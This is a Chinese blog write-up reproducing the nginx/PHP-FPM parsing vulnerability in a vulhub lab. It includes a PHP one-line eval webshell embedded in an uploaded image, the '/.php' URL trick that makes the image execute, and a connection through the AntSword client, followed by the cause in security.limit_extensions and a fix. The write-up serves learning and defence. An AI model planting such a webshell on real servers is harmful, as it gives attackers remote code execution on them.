漏洞复现-nginx_parsing_vulnerability-nginx解析漏洞

 
 
 

0x00 实验环境

攻击机:Win 10

靶场:docker拉的vulhub靶场

 

0x01 影响版本

一些配置错误的情况,与nginx、php版本无关。

常常出现为nginx解析任意文件php而导致解析漏洞。

 

0x02 漏洞复现

(1)上传一张正常的图片,然后在上传图片时进行抓包

 

 

(2)如上图所示,在图片的数据报文中加入一句话木马

<?php @eval($_POST['x']);?>

 

(3)上传完成后能看到图片上传的路径,点击访问,能成功访问到后,在图片文件名后加一个/.php

 发现成功上传并成功解析为php文件。

 

(4)使用蚁剑直接连接即可:

 

0x03 漏洞原理

nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’)。

 

如下图就是个错误的配置:

 

 

在这个www-2.conf的配置文件中,security.limit_extensions被设置为了,故什么文件都是可以执行的,所以在防护的时候,需要将这个配置为.php(即:仅为.php的文件才能执行)。

 

0x04 修复建议

设置security.limit_extensions=.php,重启一下服务即可。

 

0x05 参考文献

https://www.cnblogs.com/renhaoblog/p/12874603.html

https://idc.wanyunshuju.com/aqld/1875.html

 

0x06 免责声明

本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

posted @   铺哩  阅读(1555)  评论(3编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
点击右上角即可分享
微信分享提示